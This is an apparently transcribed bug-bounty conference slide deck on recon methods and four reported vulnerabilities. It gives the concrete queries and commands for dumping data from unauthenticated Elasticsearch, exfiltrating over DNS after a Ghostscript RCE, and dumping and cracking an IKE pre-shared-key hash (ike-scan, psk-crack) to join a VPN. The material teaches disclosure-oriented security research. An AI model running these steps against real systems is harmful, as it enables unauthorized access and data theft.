The document discusses an approach to finding critical vulnerabilities through reconnaissance techniques like port scanning, content discovery, and searching for unprotected assets. It provides 4 examples of vulnerabilities found, including taking over an unauthenticated Elastic search, leaking Kibana credentials, exploiting SSRF to achieve remote code execution via Ghostscript, and cracking an IKE hash to access a vulnerable VPN. The presentation aims to demonstrate methods for vulnerability research and responsible disclosure of issues found.

1. Approach To Find
Critical
Vulnerabilities
By Ashish Kunwar and Subhajit Saha

2. $~ What are we going to talk about?
● Approach
● Real world examples (REPORTS)
● Q/A

3. $~ WHOAMI
Subhajit Saha
~ Intern @ Signzy
~ Author of “ An approach to enhance the privacy in TOR network ”.
~ Recent CVE -> CVE-2020-13093
~ Doing BugBounties , Red Teaming ,OSINT,Open-Source Contributor.
~ @subhajitsaha0x , subhajitsaha.com

4. $~ WHOAMI
Ashish Kunwar
~ Independent Security Researcher
~ Web Application Pentester
~ I FUZZ binaries for fun (nano,giffdiff, etc)
~ Recent CVE -> CVE-2020-13093 (ispy cam. software)
~ 0day guy > ((Reacted) Proxy manager) and other issues in testlink and in a
software similar to SAP.
~ social media - @D0rkerDevil

5. $~ Approach
● Content Discovery.
● Look out for specific ports like 445 , 2222 (ssl-ssh,direct admin panel), 9200(elastic search),
3306 (mariadb,mysql) etc.
● Lookout for the empty directories like /tmp/ etc.
● Don’t ignore for status code 301, 302, 404
● Google is your best friend.
● Look at github for credentials.
● Look at Pastebin Pastes.
● Shodan is a gold mine.
● Make automated recon your habit , this makes things easier.

6. $~ Real World Examples(Reports)
1. Unauthenticated Elastic-search takeover and sensitive info
disclosure.
2. Unauthenticated kibana elasticsearch internal credential leakage
vulnerability.
3. SSRF TO RCE /GHOST SCRIPT RCE.
4. IKE Aggressive Mode Shared Secret Hash Leakage Weakness.

7. $~1. Unauthenticated Elastic-Search takeover and sensitive info
disclosure
RECON > PORTS > 9200
Found Elastic Search service running on the server.
Open > http://test.com:9200/
Response :
{ "name" : "4yVDh0x", "cluster_name" : "docker-cluster", "cluster_uuid" : "xxxxxxxxxxxxxxLA",
"version" : { "number" : "6.x.x", "build_flavor" : "default", "build_type" : "tar", "build_hash" :
"xxxxxx9", "build_date" : "20xx-0x-06T15:1x:2x.864148Z", "build_snapshot" : false,
"lucene_version" : "7.x.x", "minimum_wire_compatibility_version" : "5.x.0",
"minimum_index_compatibility_version" : "x.0.0" }, "tagline" : "You Know, for Search"}

8. $~ Continue -
Look for Indices
/_cat/indices?v
Example : GET /_cat/indices/twi*?v&s=index
You can also search for specific data like email or username , phone number etc.

9. $~ Continue
/_all/_search?q=email
This can fetch emails only or anything that matches with the email.
“This Landed us on 4 digit bounty”
Conclusion ~
Always read documentation and related posts.

10. $~ unauthenticated kibana elasticsearch internal credential
leakage vulnerability
RECON > PORT 3000 > KIBANA INSTANCE >
http://subdomain.example.com:3000/skedler/login
So they are using the skedler reports > looked at page source > found /home
Fired up burp and intercepted the request the /home was making accepting post request
{"OEM":{},"size":1,"shieldPlugin":{}}

11. $~ Continue
Response ~
“This landed us in a good bounty”

12. $~3. SSRF TO RCE (Ghost Script RCE)
Common file upload test > test for profile image upload >
● Uploaded a png file and looked at the output .png file.
● After analysing the source of the image file it was found that an interesting string
“EXtdate:modify” resided in it. It was observed that the server converted pictures
with “ImageMagick”/”GraphicksMagick” but did not add the -strip command line
option. Therefore now the converted image now has the plaintext tEXtdate: create.
● Along with this, EXtdate: modify and timestamps are usually included in the png files.

13. $~ Continue
After look at that info. And doing a quick google told me that the
endpoint it running the imagemagick.
Since, i tried with alot of imagemagick payloads , none worked
but the ghostscript in particular worked , and was time based.
So I tested with ghostscript payload and it worked.

14. $~ Continue
Therefore i was able to exfiltrate the data over DNS using burp collaborator.
And read the /etc/passwd for poc.

16. $~ 4. IKE Aggressive Mode Shared Secret Hash Leakage Weakness
RECON > PORT 500 UDP > skmp
Or isakmp > IKE/IPSEC > vpn
<ip>:500
Exploitation -
Download ikeprobe
ikeprobe.exe <ip>
Found vulnerable

17. $~ Continue
● Now next step is to get the hash from the IKE handshake and then try cracking
the SHA1 hash.
● Now we are gonna dump the hash from handshake to ike-hash file
ike-scan -M -A -Pike-hash -d 500 <ip>
● Now check if you have got the hash
● Cat ike-hash

18. $~ Continue
● Now we are going to bruteforce the hash (you will need the
username/password list) for example rockyou.txt file
● We will use psk-crack using command
● Sudo psk-crack -d rockyou.txt ike-hash
● Now once you successfully crack the password you can use the
credentials to connect to the server using the vpn , for that
● Edit /etc/ipsec.secrets and replace ENTER_PSK_HERE with
<password>

19. $~ Continue
● And now just save it and restart/start the services
● /etc/init.d/ipsec restart
● /etc/init.d/xl2tpd start
● And now run the ipsec to connect
● ipsec auto –up vpn

20. QnA

21. Thank You
Mail to: hey@subhajitsaha.com
https://twitter.com/subhajitsaha0x
https://twitter.com/D0rkerDevil
https://subhajitsaha.com/
https://medium.com/@D0rkerDevil/